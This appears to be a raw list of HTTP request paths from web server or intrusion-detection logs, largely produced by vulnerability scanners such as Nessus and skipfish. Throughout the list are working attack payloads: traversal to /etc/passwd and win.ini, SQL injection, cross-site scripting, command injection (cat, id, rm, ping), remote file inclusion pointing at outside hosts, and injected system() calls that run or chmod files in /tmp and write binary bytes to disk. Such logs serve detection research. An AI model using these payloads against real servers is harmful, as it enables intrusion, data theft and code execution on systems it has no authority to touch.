/ecmascript/ /statistics-descriptive/ /tuwjta1w.html? /cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat /etc/passwd| /javascript/rendered.exe /examples/jsp/checkbox/forum.php?do=viewtopic&cat=1&topic=1&page=1?cross_site_scripting.nasl /examples/jsp/checkbox/shopexd.asp?catalogid='42 /en-us/h5sc3gxy.cfm? /iajtej82.fts? /rbec2ohx.kspx? /9o6g5vkn.fts? /pageview postscript v2/ /examples/jsp/colors/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1 /what's_afoot/ //index.html /top.php?stuff='\x0arm q94927894 # /vhzmaia2.nsf? /cgi-local/.htpasswd /javascript/.passwd.svn-base /zroo33l4.cfm? /addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/ipb5ri? /examples/jsp/cal/core/api.php?t_path_core=/etc/passwd\x00 /javascript/online.exe /xfkun1ku.mscgi? /nav/clist.php?root=&cid=0&title=1&desc=1 /j734qobz.pl? /index.php?config[\"sipssys\"]=@rfiurl /index.php?categories=1&cat=xx' union/**/ select '1','412596083481','2','comments' /* /en-us/9kr0ih0v.php? /module/forum/forum.php?fd=http://192.168.202.118:8080/zz5thkvtmlgl?='; /6wb70v0b.exe? /javascript/employment.exe /ju0u7kfo.aspx? /examples/servlets/servlet/myevent.php?myevent_path=/etc/passwd\x00 /scripts/setup/index.php?gallery_basedir=http://xxxxxxxx/ /javascript/input.exe /edzaia0i.php3? /scripts/tomcat_proxy_directory_traversal.nasl1331904670 /ygkjkngd.jspa? /snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.118:8080/moclyxlwqyfjnp?? /scripts/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /gallean's/ /en-us/h5sc3gxy.x? /scripts/2pwudii1mt22.shtml /help.php?q='\x0adel\x09q61575727\x09# /scripts/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">
/uc3w3bdi.jsp? /phpmyadmin//\..\..\..\..\..\..\..\..\etc/passwd /scripts/count.cgi?align=topcenter /en-us/account/item.fts?href=">; / /manager/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /j734qobz.do? /main.php?logout='uname\x09>q24187781\x09# /ny1b3qq4.do? /top.php?stuff=ping;-w;9000;-n;1;1.2.3.4&rem; /en-us/9kr0ih0v.pl? /javascript/treasury.exe /yver8r9o.mscgi? /recordings/cwmail.exe /m5103snj.nsf? /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00 /main.php?logout="&sleep 11 # /quagynka.dll? /examples/jsp/colors/starnet/addons/slideshow_full.php?album_name='60314352 /x7pclv4s.asp? /jnv890lt.exe? /main.php?logout="\x0auname\x09>q98198938\x09# /javascript/logging.exe /help.php?q=';rm\x09q84185561\x09# /examples/jsp/colors/search.php?searchstring= /cacti/demos/demo.browse.php?filename=/etc/passwd /help.php?q=ver\x09>q41751651&rem\x09 /javascript/remote.exe /raanw4ia.cfm? /help.php?q=";rm q19897274 # /p043snfr.php? /imagebar_prescriptiondrugs/ /master's_education/ /main.php?frm_daynight=day&frm_passwd=q39454683&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width= /help.php?q=&ver\x09>q84722362&rem\x09 /phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.96:8080/4dckqcc0acprbz? /javascript/03.exe /7dbjwpw6.cfc? /hipscript_020825/ /examples/jsp/jsp2/jspx/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00 /javascript/sendmail.exe /javascript/06.exe /? /bin/sensepost.exe?/c+dir /examples/jsp/jsp2/el/index.php?id=' /pmwiki.php?globals[farmd]=/etc/passwd\x00 /vbscript00/ /editprojectissue.do?projectissueid="><" /iv5vkgam.aspx? /scripts/qcvjnagy16kc.cfm /main.php?logout='\x0drm q42494852 # /manager/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /."./."./winnt/win.ini .pl /clusterframe.jsp?cluster= /help.php?q="|ping;-w;8000;-n;1;4.3.2.1|rem; /o6ebbirj.fts? /o1zj4u9v.nsf? /examples/jsp/error/viewcvs.cgi/?cvsroot= /javascript/.svn.exe /examples/jsp/sessions/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /yver8r9o.exe? /dslpwt15.do? /javascript/accessibility.exe /xeklsk.exe/ /examples/servlets/servlet/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /169okeyj.php? /zuihld5m.jspa? /scripts/t99iadgtkf9h.php /en-us/account/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /examples/servlets/servlet/cvslog.cgi?file= /inc/formmail.inc.php?script_root=@rfiurl /b5xdqgz2.cgi? /insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /jujgxwav.cfm? /ddoworrl.asp? /main.php?logout="&ping;-w;7000;-n;1;1.2.3.4&rem; /help.php?q=&ver\x09>q68551744&rem\x09 /fa8p8lr8.kspx? /examples/jsp/colors/index.php?search='>&searchmode=f /examples/jsp/jsp2/el/activatemember?activatecode=&member="> /scripts/nffhikq061nq.php3 /phpmyadmin/shopexd.asp?catalogid='42 /scripts/login.mako /main.php?logout="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.96:8080/4dckqcc0acprbz?? /examples/jsp/colors/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00 /6wb70v0b.aspx? /cacti/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /scripts/fgos1sb1c1tr.shtml /top.php?stuff=&uname\x09>q78957581\x09# /cgi-bin/erba/start/ /examples/jsp/error/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ /azcrfs8d.idc? /scripts/index.asp /en-us/hipkz026.aspx? /script/param/param.inc.php?path_inc=http://192.168.202.118:8080/ghl9il? //%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /ao22ww7y.mscgi? /javascript/cgi-pub.exe /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/lhmpvdjfem.sh+>+/dev/null+&')."]=1 /javascript/17.exe /javascript/.htpasswd.sfish/skipfish://invalid/;? /ddoworrl.dll? /admin/index.php?path_to_script=http://192.168.202.118:8080/ghl9il??&cmd=ls /examples/jsp/sessions/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /friend.php?op=sitesent&fname= /apavxugx.mscgi? /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00 /examples/jsp/error/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /copying/a="%3cscript%20src=%27http://www.example.com/test?rnd=q41226228%27%3e%3c%2fscript%3e";document.writeln(unescape(a)) /b1q8bywu.cfc? /? /jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini /cgi-bin/dansguardian.pl?deniedurl= /fa8p8lr8.dll? /examples/jsp/cal/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1 /sgdynamo.exe?htname= /examples/jsp/num/source?v=../../../../../../../../../../etc/passwd\x00 /speedscript_vowels/ /ghswfouu.htm? /scripts/2sfdqydfaknx.asp /en-us/account/cart32.exe /static//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd /javascript/.passwd.rhtml /cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1303050841,0,0,0,0,0-- /zv8tv7h8.cfc? //../../../../../../../../etc/passwd\x00en /mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl? /examples/jsp/jsp2/el/sgdynamo.exe?htname=sgdynamo.exe /examples/jsp/num/include/theme.inc.php?fullpath=/etc/passwd\x00 /d44uk9h2.jsp? /script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm? /javascript/cat.exe /y8pmygrp.cfc? /raanw4ia.htm? /scripts/webdist.cgi?distloc=;id /x2gyorli.pl? /sophie moon- one of her first hardcore's/ /examples/jsp/colors/cwmail.exe /web-passwd/ /x2gyorli.jsp? /uvazfs7p.cfc? /i2n4v4rl.php? /scripts/upload.cgi /manager/admin/admin.php?sid=0' /modules.php?name=search&file=../../../../../../../../../../etc/passwd\x00 /cgi-binmessagedetail.asp?msg_id=' /main.php?logout='sleep\x098\x09# /l752x1ry.fts? /examples/jsp/jsp2/jspx/search.jsp?q=%" /examples/jsp/sessions/texis.exe/nessus /rv98iwjp.do? /h4bi26jd.aspx? /admin/login.php?path=\">

<script>alert('vulnerable') /phpmyadmin/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /o1zj4u9v.jsp? /subscriptions.py // /scriptorium/ /javascript/date.exe /cgi-bin/index.php?user_langue=../../../../../../../../../../etc/passwd /scripts/c0kha6w3apd3.cfm /main.php?logout="&ver;>q32916572&rem; /scripts /scripts/www/delivery/ac.php?bannerid=-193+or+1=1 /scriptpath/index.php?page=http://cirt.net/rfiinc.txt? /examples/jsp/error/cgi/tseekdir.cgi?location=/etc/passwd\x00 /examples/jsp/jsp2/jspx/error.php?selected_theme= /qczkquis.asp? /ap58k3ci.jsp? /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332009308,4,5 /top.php?stuff=ping;-w;7000;-n;1;1.2.3.4|rem; /6qbynt4f.asp? /gy23xnjq.html? /..\/\..\/\..\/\boot.ini /examples/jsp/num/shopaddtocart.asp?productid='42 /help.php?q=';del q86575497 # /examples/jsp/error/newsdesk.cgi?t=../../../../../../etc/passwd /examples/jsp/checkbox/index.php?name=your account&profile=anyone"> /examples/jsp/checkbox/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00 /quagynka.exe? /1r8cfrlf.asp? /examples/jsp/colors/notify?from=nessus"|id" /scripts/wx4z4gedhl0l.html /cgi-bin/productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus /aj3pf49c.fts? /x7pclv4s.do? /ap58k3ci.kspx? /addressbook/index.php?surname= /d765w06j.php? /javascript/.passwd.cfm /fa8p8lr8.dll? /search.php?searchfor=\"> /fmnveedu.kspx? /b1q8bywu.kspx? /javascript/sling.exe /help.php?q="\x0ddel\x09q14674684\x09# /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/dhbiyrztiq0+>+/dev/null+&')."]=1 / /examples/jsp/checkbox/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 /forum.asp?n=/etc/passwd\x00|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /en-us/jnv890lt.html? /egaet53a.aspx? /examples/servlets/servlet/server.pt?open=space&name=";} /t3af3tdz.kspx? /help.php?q=;del q47158875 # /module/forum/forum.php?fd=http://192.168.202.118:8080/tzhfyzkbomspvm?='; /help.php?q="ping\xa0-w\xa08000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /nyvbv05h.do? /cgi-bin/starnet/addons/slideshow_full.php?album_name='594147117 / /index.php?page=../../../../../../../../../../etc/passwd /top.php?stuff="uname # /examples/jsp/jsp2/el/ovlaunch.exe /m4kkjf8l.htm? /top.php?stuff=ver\x09>q64218613&rem\x09 /scripts/index.php?id=egyb16sayu' /examples/jsp/jsp2/jspx/lang/lang.php?lang_path=/etc/passwd\x00 /help.php?q=ver >q35544262&rem /help.php?q='\x0duname >q58812882 # /javascript/document.cnf /ows-bin/oasnetconf.exe?-l -s blahblah /cgi-bin/webbbs.exe /ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/moclyxlwqyfjnp?' /notice-description/ /fmnveedu.mscgi? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+5f5+>>esbq /examples/jsp/cal/auktion.cgi?menue=../../../../../../../../../etc/passwd /javascript/note.exe / /sojourn.cgi?cat=../../../../../etc/passwd\x00 /admin/config.php?display=1'or1=1 /main.php?stuff="|ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /o6ebbirj.jspa? /scripten/ /examples/servlets/servlet/showcat.php?cat=1' /xsqln7eb.htm? /examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /iissamples/sdk/asp/docs/winmsdp.exe?source=/iissamples/\xc0\xae\xc0\xae/default.asp /qczkquis.cgi? /rpxyx07v.asp? /mail.php?id='/**/union/**/select/**/1,2,1332008335,4--&blog=1 /9o6g5vkn.aspx? /examples/jsp/cal/index.php?configfile=../../../../../../../../../etc/passwd /cacti/mail.php?id='/**/union/**/select/**/1,2,1331905235,4--&blog=1 /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- /en-us/account/pfdispaly.cgi?../../../../../../etc/passwd /transcript-6/ /profile.php?user=' /en-us/i686v90l.aspx? /help.php?q="rm q97915511&rem /hipkz026.jsp? /oie504mr.dll? /fo564rei.dll? /help.php?q="del\x0bq49522765&rem\x0b /javascript/insert.exe /h4bi26jd.htm? /en-us/jnv890lt.pl? /javascript/inc.exe /examples/jsp/num/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ /examples/jsp/colors/phptonuke.php?filnavn=/etc/passwd /hoteldescription/ /scripts/event_view.php?eid=34 union select 692795576 /recordings/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd /h4bi26jd.php? /bn857frh.pl? /main.php?frm_daynight=q68663511&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width= /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904243,4,5 /javascript/50.exe /citrix/metaframexp/default/login.asp?nfuse_logoutid=&nfuse_messagetype=error&nfuse_message=&clientdetection=on /phpmyadmin/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /0z575z74.cfm? /scripts/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\+/og /main.php?stuff="&rm\x0bq12538123&rem\x0b /? /scripts/forum.php?forum=-1 union select null,123456,null,null,null,null-- /examples/jsp/checkbox/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00 /top.php?stuff="ver\x0b>q24192811&rem\x0b /examples/jsp/num/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd /ahn'qiraj/ /admin/common/script.js.php~ /top.php?stuff="ping -w 9000 -n 1 1.2.3.4&rem /byrg33fw.asp? /cacti/shopexd.asp?catalogid='42 /examples/jsp/checkbox/dsweb/services/user-1"> /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=q25559316 /fmnveedu.aspx? /javascript/htpasswd.sh /x2gyorli.php3? /actionscriptcode1/ /9kr0ih0v.jspa? /d5a5renl.php3? /recordings/core/editor.php?editor_insert_bottom=/etc/passwd /qb2xy9aw.php? /scripts/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /simple/view_page?mv_arg=|cat /etc/passwd| /oie504mr.mscgi? /scripts/prnnucptkixl.pl /scripts/callboth.php?seq=654321&out=123456&in=1331905185@nessus\x0d\x0aasteridex_in_code_injection.nasl /help.php?q='uname\x09>q77922174\x09# /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/2aibfaczmac8?? /nukescripts/ /examples/jsp/sessions/a1disp3.cgi?/../../../../../../etc/passwd /top.php?stuff="\x0duname\x09>q29585118\x09# /scripts/n4p4f4gtbhia.cgi /read.php?pagenum_rsread=1&totalrows_rsread= ../../../../../../../../../../etc/passwd /manager/add_url.htm?node= /modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini /phpmyadmin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- /examples/jsp/checkbox/shopper.cgi?newpage=../../../../../../etc/passwd /ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/zz5thkvtmlgl?' /byrg33fw.jspa? /scripts/zq9frlz6fcfp.inc /blue's/ /manager/newsscript.pl?mode=admin /j4drbkil.kspx? /cgi-bin/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /examples/jsp/sessions/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /scripts/pssdseehtgdp.inc /xfkun1ku.dll? /l752x1ry.jspa? / /eei78ore.pl? /scripts/c0kha6w3apd3.sh /xsqln7eb.fts? /javascript/pwd.exe /manager/search.jsp?q=%" /javascript/owl.exe /cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 /scripts/manage/login.asp / /report.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8?? /top.php?stuff="&rm\xa0q97411474&rem\xa0 /free-scripts/ /examples/servlets/servlet/awstatstotals.php?sort="].passthru('id').exit().$a[" /cgi-915/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /scripts/phf?qalias=x\x0a/bin/cat /etc/passwd /byrg33fw.htm? /cp job description 2006/ /scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/ghl9il? /i2n4v4rl.do? /cacti/cgiip.exe/wservice=wsbroker1/webutil/ping.p /cgi-home/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /help.php?q="uname\x09>q12928131\x09# /\..\..\..\..\winnt\win.ini /top.php?stuff=;sleep\x097\x09# /j2kdmfw4.jsp? /examples/jsp/cal/adodb/server.php?sql='adodb_sql_sql_injection.nasl /help.php?q="ping\x0b-w\x0b11000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /manager/starnet/addons/slideshow_full.php?album_name='1751116086 /static//./../../../../../../../.etc/passwd /scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1332010400,529560500 -- /_vti_bin/shtml.exe?_vti_rpc /javascript/changes.exe /iisprotect/admin/siteadmin.asp?v_sitename=&v_firsttab=groups&v_secondtab=all&groupname=nessus' /0u75ldxq.x? /help.php?q=ver;>q25171792&rem; /examples/jsp/cal/activatemember?activatecode=&member="> /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /help.php?q="ver;>q77231587&rem; /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'-- /main.php?stuff=ver&rem; /readmore.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt? /recordings/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /? /main.php?logout=";del q32339726 # /cgi-bin/mail/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00 /scripts/tomcat_proxy_directory_traversal.nasl1332010400 /hipkz026.asp? /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/tzhfyzkbomspvm?? /securescripting/ /index.php?id=mumrj3sj0o' /cgi-bin/index.php?cat=' /0rufe52p.jspa? /manager/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /en-us/n9xlumt5.mscgi? /top.php?stuff=ver\x0c>q49699449&rem\x0c /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=&scr_height=q52912831&scr_width= /jw64yq8u.x? /hjdzm96v.idc? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/ldlivpaolb0;')."]=1 /ybz5rz7a.cfm? /en-us/hipkz026.cfm? /cgi-win/testcgi.exe /help.php?q=@' /oldtranscripts/ /o35zot2r.cfc? /javascript/alpha.exe /help.php?q='&uname >q65268232 # /7uz3ok60.htm? /scripts/t99iadgtkf9h.inc /scriptkiddies/ /w4996nr0.do? /cgi-bin/store.php?crn=42'&action=show&show_products_mode=cat_click /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /top.php?stuff="|ping\xa0-w\xa010000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /0qhcnefz.jsp? /main.php?stuff='&del q83741819 # /javascript/tmps.exe /top.php?stuff="&ping;-w;9000;-n;1;1.2.3.4&rem; /scripts/ylrvly9nh_pf.php3 /ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/2aibfaczmac8?' /javascript/it.exe /awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/yzicxmyifv0;echo|awstats957386.txt /fcgi-bin/fileseek2.cgi?foot=;cat /etc/passwd&head= /examples/jsp/num/user.cgi?url=">&from=add /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/ipb5ri? /javascript/axis2.exe /d765w06j.x? /what's new grandstream sale/ /cgi-bin/notify?from=nessus"|id" /main.php?stuff=&ver >q24433373&rem /xboxsubscriptionplan/ /apavxugx.php3? /xsqln7eb.php? /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905220','5'-- /k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /examples/servlets/servlet/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/txenjrxf3?\x00 /examples/jsp/sessions/tinybrowser/upload.php?badfiles=1> /tukodz3j.kspx? /5o9zq43e.kspx? /administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/2aibfaczmac8? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+10+00+00+00+20+00+00+00+00+40+00+00+10+00+00+00+02+00+00+04+00+00+00+00++>>esbq /o6ebbirj.cfc? /phpmyadmin/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /redirect.php/">?subject=server&server=test /phpnews/sendtofriend.php?mid='1' /symantec sued for labeling product 'adware'/ /ju0u7kfo.jsp? /6wb70v0b.pl? /javascript/.htaccess.sfish/'`true`' /bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/whmch8ftkt7kv? /quagynka.dll? /javascript/htpasswd.pdf /sysuser/docmgr/template.stm?path= /aj3pf49c.jsp? /cgi-bin/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /x7pclv4s.jspa? / /prescriptionviagra/ /main.php?logout="del q41454446&rem /i686v90l.nsf? /o6ebbirj.jsp? /javascript/signon.exe /main.php?stuff='\x0auname # /help.php?q=";rm q43236884 # /3m5knyc4.php? /main.php?stuff="&ping\x09-w\x0910000\x09-n\x091\x094.3.2.1&rem\x09 /pam_script/ /examples/jsp/checkbox/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /scripts/forum/hcspecific/enableforum.asp?action=enableforum&forumid='hosting_controller_forumid_sql_injection.nasl /r3le3om5.htm? /main.php?stuff="ver\x09>q42253935&rem\x09 /6dlc2zm9.aspx? /d7ktpmcq.mscgi? /javascript/export.exe /scripts/rest/api/2.0.alpha1/serverinfo /javascript/bin.exe /javascript/document.tar.gz /file_smbpasswd/ /scriptsite_information/ /examples/jsp/sessions/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /examples/jsp/cal/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt /www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00 /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://cirt.net/rfiinc.txt?\x00 /vwmg565s.html? /de3v2dd9.cgi? /cacti/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /rbec2ohx.do? /examples/jsp/num/index.php?post=../config/password /eei78ore.cfc? /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah /examples/jsp/cal/pfdispaly.cgi?../../../../../../etc/passwd /usr/extensions/get_infochannel.inc.php?root_path=http://cirt.net/rfiinc.txt??cmd=id;pwd /descriptionvakkengids/ /? /scripts/6gl21a1hiz3s.shtml /javascript/eng.exe /i7prbs22.exe? /javascript/.passwd.htm /script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl? /javascript/htpasswd.old /scripts/www/delivery/ac.php?bannerid=-206+or+1=1 /help.php?q="del,q58627156&rem, /cgi-bin/wordtrans.php?command=show_desc&advanced=1";id; true " /addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/4dckqcc0acprbz? /examples/jsp/num/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00 /en-us/i686v90l.aspx? /help.php?q="|ping -w 9000 -n 1 1.2.3.4|rem /mpcgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /cgi-915/fileseek2.cgi?foot=;cat /etc/passwd&head= /examples/jsp/sessions/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /scriptpath/index.php?page=http://192.168.202.118:8080/ghl9il? /6dlc2zm9.kspx? /ttxssh2_100alpha3/ /scripts/index.php?edit=nonexistant1597386916 /tuwjta1w.cgi? /i686v90l.jspa? /top.php?stuff=&ver,>q82213421&rem, /ydexw8by.asp? /7uz3ok60.mscgi? /examples/jsp/jsp2/el/athenareg.php?pass= ;id /en-us/static/@95063:81/app/launcher/scripts/tabify.js /my sister's hot friend - sativa rose/ /cross-site_scripting/ /examples/jsp/colors/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /help.php?q=rm;q42148333&rem; /examples/jsp/jsp2/el/pfdispaly?../../../../../../etc/passwd /phpmyadmin/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4c+cd+21+54+68+69+73+20+70+72+6f+67+72+61+6d+20+63+61+6e+6e+6f+74+20+62+65++>>ctdn /examples/jsp/sessions/index.php?show=../../../../../../../../../../../etc/passwd\x00 /main.php?logout="del q44662571 # /subscriptions.inc /wanted pictures of escaped killers 'breach their human rights'/ /h21y8w52.idc? /manager/perl.exe?-v /..\..\..\..\..\..\..\..\..\..\winnt\win.ini /top.php?stuff="\x0arm q63768352 # /namesxss/ /jnt3f86c.mscgi? /get.php?username=
force_xss_for_test
/xsqln7eb.cfc? /../webserver.ini /main.php?frm_daynight=day&frm_passwd=q66334283&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width= /examples/jsp/checkbox/index.php?search=&function=search /digitale camera's/ /en-us/account/pmwiki.php?globals[farmd]=/etc/passwd\x00 /emailfriend/emailfaq.php?id=\" /phpmyadmin/print.php?what=article&id=' /webcgi/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /top.php?stuff=";rm q35544877 # /examples/servlets/servlet/admin/admin.php?sid=' /j4drbkil.html? /examples/jsp/cal/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /help.php?q=\x0auname >q17379542 # /en-us/.mscgi /j2kdmfw4.cfm? /modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd / /top.php?stuff=;rm\x09q71367433\x09# /scripts/index.php?id='union/**/select/**/0,0,20217353,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /tukodz3j.fts? /subscriptions.fcgi /rbec2ohx.mscgi? /fo564rei.x? /3hlysl2x.asp? /6qbynt4f.nsf? /phpmyadmin/index.php?act=arcade&do=stats&gameid=1' /news.php?config[script_path]=http://cirt.net/rfiinc.txt?? /phpmyadmin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'-- /script/gestion/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl? /examples/jsp/error/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd /azcrfs8d.fts? /javascript/wwwboard.exe /u8yiqilu.kspx? /bzuf9ozq.nsf? /h5i6crm3.html? /scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/frznctvhi0i5? /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00 /examples/jsp/num/cvslog.cgi?file= /examples/jsp/colors/review.php?id=1&cat=&subcat="> /manager/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg /cgis/ion-p.exe?page=c:\winnt\repair\sam /cgi-bin/whois_raw.cgi?fqdn=\x0acat /etc/passwd /ap58k3ci.cfc? /main.php?stuff="ver\x09>q12267523&rem\x09 /gy23xnjq.php3? /examples/jsp/num/help/index.php?help_file=../../../../../../../../../../../etc/passwd /copying/q33749448&q3338"q3338<q3338>q33749448 /6dlc2zm9.exe? /? /javascript/reverse.exe /john battelle's searchblog-tm/ /h4bi26jd.dll? /manager/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl /jujgxwav.html? /examples/jsp/error/search.pl?form=../../../../../../etc/passwd\x00 /i2n4v4rl.php3? /print_subscription/ /cgi-914/vssetcookie.exe 